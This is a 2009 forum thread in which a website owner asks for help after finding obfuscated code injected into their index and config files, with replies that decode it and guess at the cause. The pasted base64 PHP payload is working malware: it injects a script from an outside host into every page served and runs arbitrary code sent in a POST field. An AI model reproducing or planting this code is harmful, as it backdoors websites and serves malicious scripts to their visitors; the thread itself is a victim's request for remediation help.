tkm Posted October 12, 2009 Share Posted October 12, 2009 Hello Friends, Need your help desperately. My site has just been hacked. Someone has put the following javascript code in my index file, config file. Code: eval(base64_decode('aWYoIWlzc2V0KCRkMGpuMSkpe2Z1bmN0aW9uIGQwam4oJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNj cmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYp KT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVn X21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwn ZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFte Pl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxz Kj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9 cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNl KCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMXZZbmxrYVdOcmNtOWpheTV5ZFM5b2IzQmxMM2xo Ym1SbGVGODJObUUzT1RjelpqWmxZV1k1WW1FNUxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxi b2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkk cy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBkMGpuMigkYSwkYiwkYywkZCl7Z2xvYmFsICRkMGpuMTskcz1hcnJheSgpO2lmKGZ1 bmN0aW9uX2V4aXN0cygkZDBqbjEpKWNhbGxfdXNlcl9mdW5jKCRkMGpuMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0 YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdkMGpuJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJyli cmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRz KS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2Qwam4n KTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kZDBqbmw9 KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2Qwam4yJykpIT0nZDBqbjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1Rb J2UnXSkpOw==')); ?> I have XSS injection blocking code for all my inputs. Not sure at all, how this has happened. Any help would be greatly appreciated. Thankx. Quote Link to comment Share on other sites More sharing options...
Adam Posted October 12, 2009 Share Posted October 12, 2009 Can't speculate as to how they got it in there, but if you decode all that there's a script tag trying to include "http://mobydickrock.ru/hope/yandex_66a7973f6eaf9ba9.php". My Russian isn't exactly fluent but from visiting mobydickrock.ru just looks like some kind of normal rock music website.. Can't see them wanting to/intentionally doing this to you. Perhaps run your site through some security tools and seeing if they pick up on any vulnerabilities so you could prevent this from happening again. Quote Link to comment Share on other sites More sharing options...
exally Posted October 23, 2009 Share Posted October 23, 2009 I have heard of this recently. If you have an old version of FckEditor that could be a cause. There is also numerous other ways that do it to. More likely this vuneralbility was somethign that you did not do but a third party software. Any thoughts on that? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.